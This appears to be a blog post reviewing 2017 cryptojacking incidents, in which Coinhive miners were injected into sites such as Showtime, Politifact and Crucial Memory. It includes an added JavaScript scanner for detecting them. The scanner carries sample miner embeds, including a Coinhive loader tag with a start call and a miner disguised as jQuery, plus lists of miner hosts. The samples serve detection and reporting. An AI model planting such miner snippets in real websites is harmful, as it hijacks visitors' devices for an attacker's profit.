Cryptojacking: 2017 Year-End Review

In 2017, we witnessed the rise of cryptojacking malware. A common target was compromised websites and their unsuspecting visitors.

How Cryptojacking Works
How cryptojacking works illustration by the European Union Agency for Network and Information Security (ENISA).

Cryptojacking begins after Coinhive or another JavaScript cryptocurrency mining script is embedded in a compromised website, typically as a script tag that loads the miner library followed by a few lines that start it with the attacker's site key. The browsers of unsuspecting visitors then mine the cryptocurrency Monero (XMR) for the attacker for as long as the page stays open.

Mining is CPU-intensive and, unless the script is throttled, can consume all the CPU resources of the victim's device. This leads to higher energy usage, rapid battery drain on mobile devices, and in extreme cases damage from overheating.
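To make the embed pattern concrete, here is a small static scanner, added as an example and not code from the original post. Given page HTML it reports script tags that load a known Coinhive host or call the Coinhive API inline, and it can classify a fetched script body on its own so that a miner served under an innocent filename (the jQuery masquerade mentioned further down) is still caught. The Coinhive host names and API names are real; every sample page, URL and site key below is constructed for this example.

```javascript
// Added example, not code from the original post: a static scanner for the
// browser-side cryptojacking embed described above. Host names and API names
// are Coinhive's real ones; all sample pages and URLs are constructed.

const MINER_HOSTS = ['coinhive.com', 'coin-hive.com', 'authedmine.com'];

// Inline calls that show a Coinhive miner being created.
const MINER_API_PATTERNS = [
  /CoinHive\.Anonymous\s*\(/,
  /CoinHive\.User\s*\(/,
];

const SCRIPT_TAG_RE = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
const SRC_ATTR_RE = /\bsrc\s*=\s*["']([^"']+)["']/i;

// Resolve a script URL against a placeholder page origin and return its host
// ('' if unparsable), so relative script paths are handled too.
function hostOf(src) {
  try {
    return new URL(src, 'https://page.example/').hostname.toLowerCase();
  } catch (e) {
    return '';
  }
}

// Match the host itself or any subdomain, but not lookalikes such as
// coinhive.com.evil.example.
function isMinerHost(host) {
  return MINER_HOSTS.some((h) => host === h || host.endsWith('.' + h));
}

// Classify one script by its URL and (when available) its body. A miner
// renamed to jquery.min.js still has to call the mining API, so the body
// check does not depend on the filename.
function classifyScript(src, body) {
  if (src && isMinerHost(hostOf(src))) {
    return { kind: 'miner-library', src };
  }
  const hit = MINER_API_PATTERNS.find((re) => re.test(body || ''));
  if (hit) {
    return { kind: 'miner-start', src, pattern: hit.source };
  }
  return null;
}

// Walk every <script> tag in the page HTML and collect findings.
function scanPage(html) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_TAG_RE)) {
    const srcMatch = m[1].match(SRC_ATTR_RE);
    const src = srcMatch ? srcMatch[1] : null;
    const finding = classifyScript(src, m[2]);
    if (finding) findings.push(finding);
  }
  return findings;
}

// Constructed sample: the two-tag embed seen on compromised sites in 2017.
const INFECTED_PAGE = `<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0.2 });
  miner.start();
</script>
</head><body>video player</body></html>`;

// Constructed sample: an ordinary page with a genuine-looking jQuery include.
const CLEAN_PAGE = `<html><head>
<script src="https://cdn.example/jquery-3.2.1.min.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body>nothing to see</body></html>`;

// Constructed sample: a miner loader served under a jQuery-looking filename.
const FAKE_JQUERY_SRC = 'https://static.example/js/jquery.min.js';
const FAKE_JQUERY_BODY =
  "!function(){var m=new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');m.start()}();";

console.log('infected page:', scanPage(INFECTED_PAGE));
console.log('clean page:', scanPage(CLEAN_PAGE));
console.log('fake jquery:', classifyScript(FAKE_JQUERY_SRC, FAKE_JQUERY_BODY));
```

The host check deliberately matches subdomains but not suffix lookalikes, and the body check is what keeps a renamed or CDN-hosted copy of the loader from slipping past a host list alone. It will not catch a miner that obfuscates its API calls; for that, a blocking extension or CPU-usage monitoring is the practical control.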

Many well-known websites were compromised in 2017 with cryptojacking malware.

Showtime Networks

Coinhive found on Showtime's website
For an entire weekend in September, subscribers of Showtime’s video streaming website, Showtime Anytime, were subjected to cryptojacking.

Back in September, I was the first to document the cryptojacking incident of CBS’ Showtime Networks’ websites. Coinhive malware was found to be present on video streaming site ShowtimeAnytime.com for three straight days.

Showtime has refused to comment on why the code appeared on its websites. The Coinhive code was found inside a New Relic code block, but a New Relic spokesman denied any responsibility in the matter.

Politifact 

Politifact's website hacked to run Coinhive malware
Hackers embedded Coinhive on Politifact’s website after compromising one of their AWS servers.

On October 13, Coinhive was found on the political fact-checking website Politifact. The cryptojacking script was being injected by a compromised JavaScript library. The malicious code remained on the site for at least four hours before it was removed.

In a statement provided to The Wall Street Journal, PolitiFact Executive Director Aaron Sharockman stated, “Hackers were able to install their script on the fact-checking website after discovering a misconfigured cloud-computing server.”

UFC Fight Pass

UFC Fight Pass hosting Coinhive malware
The cryptojacking of UFC’s Fight Pass website went viral on Reddit as multiple users confirmed the presence of Coinhive.

Early in November, numerous users reported the subscription video streaming service of the UFC, dubbed Fight Pass, was running cryptojacking malware. A UFC.tv customer saved a copy of the source code (above) where Coinhive was found. However, in a statement released to me (below), the UFC denied the code was ever present on their website.

UFC statement regarding cryptojacking allegations

Crucial Memory and Everlast Worldwide

Coinhive found on the website of Crucial Memory

Coinhive on Everlast's website
The cryptojacking of Crucial Memory's and Everlast's websites was due to a compromised live help chat widget.

On Thanksgiving Day, I found a large cryptojacking campaign spanning 1,400+ websites. The two most notable sites were those of Crucial Memory and Everlast Worldwide. Normally you would never associate these two brands together; however, both their websites shared the same embedded code: a live chat widget provided by LiveHelpNow. LiveHelpNow stated one of their CDN servers was compromised and injected with the cryptojacking malware Coinhive.

Globovisión and Movistar

Google Tag Manager was used to inject Coinhive on Globovision's website

Google Tag Manager was used to inject Coinhive on Movistar's website
Google Tag Manager was used to inject Coinhive on Movistar's and Globovisión's websites.

In two separate incidents, I found Coinhive was injected into the websites of Globovisión and Movistar using Google Tag Manager. Movistar stated that Coinhive was not put on their website by a hacker, but instead was due to “an internal error” while they were conducting “pre-production tests.” No statement was provided by Globovisión on why the cryptojacking malware appeared on their site on November 15.

Chrome extension “Archive Poster”

Archive Poster Chrome extension infected with cryptojacking malware
Multiple users reported the cryptojacking behavior of the “Archive Poster” extension.

Cryptojacking was not limited to websites in 2017 as we saw Chrome extensions also being affected. One such extension, Archive Poster, remained on the Chrome Web Store for days while silently cryptojacking an unknown portion of their 100,000+ users.

Despite multiple user reports, Google's response lacked any initiative to remove the malware-infected extension. After I reported the issue to them, it was finally pulled.

Other sources of cryptojacking found

Coinhive is not the only JavaScript cryptocurrency miner available for use. Many clones have popped up in its wake. Using PublicWWW, I was able to find how many websites were using a copycat.

JavaScript cryptocurrency miners
Non-Coinhive JavaScript cryptocurrency miners found on 2017-12-24.

One of the up-and-coming Coinhive knockoffs, Minr, offers built-in obfuscation and uses multiple domain names to evade detection.

Domains used by Minr malware change frequently.

Other notable cryptojacking malware discoveries in 2017

— Being found on nearly 2,500 ecommerce websites
— Masquerading as a jQuery file on 4,000 websites
— Concealed with hidden browser window mining
— Even a Starbucks WiFi provider was found running Coinhive

Heading into 2018, the question remains how to stop the spread of cryptojacking malware. Luckily we have seen anti-mining browser extensions, such as No Coin and MinerBlock, developed to help curb the threat. The popular ad blocker uBlock Origin now blocks most cryptojacking scripts as well. Many anti-malware applications, such as Malwarebytes, have started blocking cryptojacking scripts too.
